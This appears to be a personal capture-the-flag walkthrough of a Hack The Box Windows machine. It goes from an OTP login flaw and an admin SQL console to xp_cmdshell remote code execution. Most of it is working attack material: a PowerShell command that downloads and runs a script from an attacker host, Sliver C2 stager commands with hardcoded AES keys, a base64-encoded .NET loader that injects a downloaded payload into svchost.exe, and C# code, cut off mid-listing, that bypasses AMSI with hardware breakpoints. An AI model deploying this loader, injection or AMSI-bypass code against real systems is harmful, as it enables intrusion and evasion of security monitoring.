10.10.14.221 my ip

10.10.11.5 machine ip

http://freelancer.htb/accounts/login/otp/Mg==/b92264a30d0ed8d3fb034cc68ba312d0/

http://freelancer.htb/accounts/login/otp/MTAwMTE=

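I had to change the OTP token segment in the QR-code login link to Mg== to get admin on the web page. Mg== is Base64 for the user ID 2 and MTAwMTE= decodes to 10011, which suggests the endpoint trusts a client-supplied user ID that is not bound to the one-time token.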

Then I did directory enumeration and found a page, /admin, which had a SQL terminal.

johnHalond@freelancer.htb

dboSQL_USER
guestSQL_USER
INFORMATION_SCHEMASQL_USER
sysSQL_USER
Freelancer_webapp_us

The following query is used to get the rev shell.

Check zero point for some manual enumeration.

-- Purpose: switch to the sa login, turn on xp_cmdshell, run one OS command, then drop back.
-- EXECUTE AS LOGIN only succeeds when the current login holds IMPERSONATE on sa (or is sysadmin).
-- NOTE(review): presumably the web application's database login had that grant; confirm by
-- auditing sys.server_permissions, since the grant is the root cause of everything below.
EXECUTE AS LOGIN = 'sa';
-- 'Show Advanced Options' must be 1 before xp_cmdshell can be changed through sp_configure.
EXEC sp_configure 'Show Advanced Options', 1;
RECONFIGURE;
-- xp_cmdshell is switched from disabled to enabled here. SQL Server writes each sp_configure
-- change to its error log (message 15457), which is a useful alerting point for defenders.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Runs PowerShell with -ExecutionPolicy Bypass to fetch amsi64.txt from 10.10.14.32 over plain
-- HTTP and pipe it to iex. The command is spawned by the SQL Server service process, so
-- sqlservr.exe launching cmd.exe/powershell.exe is a high-signal process chain for detection.
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.32/amsi64.txt'' -UseBasicParsing | iex"';

-- Returns to the original login context; xp_cmdshell itself is left enabled.
REVERT;

Listener

https -L 10.10.14.221 -l 443

Setup for Powershell payload

profiles new -b https://10.10.XX.XXX:443 --skip-symbols --format shellcode --arch amd64 sliver64_htb

Stage Listener for msfvenom Payload

stage-listener --url https://10.10.14.221:8445 --profile osep_64 --prepend-size

Stage Listener for C# payload

stage-listener --url https://10.10.XX.XXX:8446 --profile sliver64_htb -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV

Generating C# shellcode runner

sliverphollow64.txt

vim sliverphollow64.txt
$encodeStr = "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VBVEVfREVGQVVMVF9FUlJPUl9NT0RFAENSRUFURV9ORVdfQ09OU09MRQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBTeXN0ZW0uSU8AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAFBST0ZJTEVfVVNFUgBQUk9GSUxFX1NFUlZFUgBDUkVBVEVfRk9SQ0VET1MASURMRV9QUklPUklUWV9DTEFTUwBSRUFMVElNRV9QUklPUklUWV9DTEFTUwBISUdIX1BSSU9SSVRZX0NMQVNTAEFCT1ZFX05PUk1BTF9QUklPUklUWV9DTEFTUwBCRUxPV19OT1JNQUxfUFJJT1JJVFlfQ0xBU1MAREVUQUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJPQ0VTUwBNRU1fQ09NTUlUAENSRUFURV9JR05PUkVfU1lTVEVNX0RFRkFVTFQAQ1JFQVRFX1VOSUNPREVfRU5WSVJPTk1FTlQARVhURU5ERURfU1RBUlRVUElORk9fUFJFU0VOVABBRVNJVgBnZXRfSVYAc2V0X0lWAENSRUFURV9OT19XSU5ET1
cAZHdYAElOSEVSSVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAERvd25sb2FkRGF0YQBkYXRhAGNiAG1zY29ybGliADw+YwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUASURpc3Bvc2FibGUAYkluaGVyaXRIYW5kbGUAbHBUaXRsZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAENvbWJpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBYNTA5Q2VydGlmaWNhdGUAY2VydGlmaWNhdGUAQ3JlYXRlAERlbGVnYXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEb3dubG9hZEFuZEV4ZWN1dGUAZHdYU2l6ZQBkd1lTaXplAGR3U3RhY2tTaXplAGR3U2l6ZQBTaXplT2YAc2V0X1BhZGRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcATGVuZ3RoAFVyaQBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBnZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sAc2V0X1NlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAE1hcnNoYWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAHVybABEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0AQ29tcHJlc3Npb25BbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb3B5VG8AbHBTdGFydHVwSW5mbwBaZXJvAGxwRGVza3RvcABTbDF2ZXJMb2FkZXIAc2VuZGVyAGJ1ZmZlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgAuY2N0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ2
5vc3RpY3MAQWVzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAU3NsUG9saWN5RXJyb3JzAHNzbFBvbGljeUVycm9ycwBoUHJvY2VzcwBscEJhc2VBZGRyZXNzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBhZGRyZXNzAERlY29tcHJlc3MAQ29uY2F0AE9iamVjdABmbFByb3RlY3QAU3lzdGVtLk5ldABXZWJDbGllbnQAbHBFbnZpcm9ubWVudABEZWNyeXB0AEdldFdlYlJlcXVlc3QAc2V0X1RpbWVvdXQAV2ViQ2xpZW50V2l0aFRpbWVvdXQAaFN0ZElucHV0AGhTdGRPdXRwdXQAY2lwaGVydGV4dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABUb0FycmF5AEFFU0tleQBnZXRfS2V5AHNldF9LZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBUYXJnZXRCaW5hcnkAV3JpdGVQcm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBTeXN0ZW0uTmV0LlNlY3VyaXR5AAAAAAApQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAAARZABlAGYAbABhAHQAZQA5AAAJZwB6AGkAcAAAAKxYlsahxW1AtCyNh6nzAG0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAhcHDB0FFRJFAQUdBR0FDggSGBEQGAgYCAQAABJ9BSACARwYCwACEoCREoCREoCRBQABARJ9BSABHQUOBRUSRQEFBSABARMABSAAHRMABQACDg4OAgYYEA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"

$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://10.10.14.221:8446/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56

$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)

amsi64.txt

vim amsi64.txt
 
$HWBP = @"
using System;
using System.Collections.Generic;
using System.Linq.Expressions;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
 
namespace HWBP
{
    public class Amsi
    {
        static string a = "msi";
        static string b = "anB";
        static string c = "ff";
        static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll");
        static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er");
        static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));
 
        public static void Bypass()
        {
            WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();
            ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;
 
            MethodInfo method = typeof(Amsi).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public);
            IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());
 
            Marshal.StructureToPtr(ctx, pCtx, true);
            bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);
            ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));
 
            EnableBreakpoint(ctx, pABuF, 0);
            WinAPI.SetThreadContext((IntPtr)(-2), pCtx);
        }
 
        public static long Handler(IntPtr exceptions)
        {
            WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();
            ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));
 
            WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();
            ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));
 
            WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();
            ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));
 
            if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)
            {
                ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);
 
                IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean
 
                Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);
 
                ContextRecord.Rip = ReturnAddress;
                ContextRecord.Rsp += 8;
                ContextRecord.Rax = 0; // S_OK
 
                Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT
                return WinAPI.EXCEPTION_CONTINUE_EXECUTION;
            }
            else
            {
                return WinAPI.EXCEPTION_CONTINUE_SEARCH;
            }
 
        }
 
        public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)
        {
            switch (index)
            {
                case 0:
                    ctx.Dr0 = (ulong)address.ToInt64();
                    break;
                case 1:
